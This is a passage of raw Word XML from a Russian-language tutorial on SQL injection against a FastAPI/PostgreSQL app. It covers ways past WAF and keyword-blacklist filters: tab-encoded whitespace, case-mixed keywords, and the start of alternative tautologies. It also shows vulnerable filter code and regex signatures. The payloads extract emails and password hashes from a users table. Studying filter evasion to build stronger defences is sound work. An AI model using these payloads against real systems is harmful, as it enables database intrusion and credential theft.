        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (URL-encoded, в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222BCCA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x'%09UNION%09SELECT%09id,%09email,%09password_hash%09FROM%09users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05560A1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>После URL-decode на стороне FastAPI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CEDB44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>id,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>email,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEACA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обозначен табом). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF23A30"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'x'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>id,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>email,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>users--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF3421" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG-лексер табы между токенами трактует как whitespace, парсит обычный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для CR-варианта — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (newline). Для form-feed — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0C</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6FB705" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> современный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ловит таб; этот payload работает против старого ModSecurity или против самописного фильтра вроде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if " UNION SELECT " in q.upper()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (где между словами literal space). Для CRS — нужен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload A) или dollar-quote-обёртка (3.9.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD1D46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — case-mixing для case-sensitive blacklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE8D3FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст — sanitizer в коде приложения, не WAF из 3.9.0. Классические уязвимые формы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58191DF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># уязвимо — substring match case-sensitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569EBDFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if "UNION" in q or "SELECT" in q:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EB23B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise HTTPException(400)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C53184" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75096439" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># уязвимо — то же</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456E5A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>forbidden = ["UNION", "DROP", "EXEC"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B516C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if any(f in q for f in forbidden):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236B0DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise HTTPException(400)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B3A4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20681156" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># не уязвимо — uppercase нормализация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DE2A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if "UNION" in q.upper():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399D0A21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise HTTPException(400)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A73E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D0536" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UnIoN SeLeCt id, email, password_hash FrOm users WhErE 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639DCD78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E0612A"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'x' UnIoN SeLeCt id, email, password_hash FrOm users WhErE 1=1--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC69AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>PG полностью case-insensitive на keywords (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</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FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unquoted identifiers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (имена таблиц </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, колонок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Конкретно: парсер на этапе токенизации приводит unquoted идентификаторы к lower-case (см. PG Lexical Structure §4.1.1). Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UsErS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pG_AuThId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>. Quoted identifiers (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Users"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"pg_authid"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — case-sensitive: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"pg_authid"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> находит таблицу, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"PG_authid"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уже нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E7DB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что не работает:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строковые литералы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'AdMiN'</w:t>
      </w:r>
      <w:r>
        <w:t>) — это значения, PG их не нормализует. Case-mixing бесполезен для скрытия содержимого литералов; для них нужен 3.9.2/3.9.3/3.9.4/3.9.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD8CE76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Анти-сигнатура.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий ставит сам себе ловушку, когда WAF использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: paylod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UnIoN SeLeCt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> против </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bUNION\s+SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> срабатывает на сигнатуре. Поэтому 3.9.6 Payload C применим только когда фильтрация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>точно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case-sensitive — иначе он эквивалентен обычному </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и блокируется как раз WAF из 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64755291" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload D — альтернативные тавтологии (без `OR 1=1`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED6C61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WAF 3.9.0 блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR\s+1\s*=\s*1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> точечно — это самая часто-сигнатура SQLi-сканеров. Семантически эквивалентные конструкции, которые не покрываются этим конкретным regex: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12E137CE"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66387B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
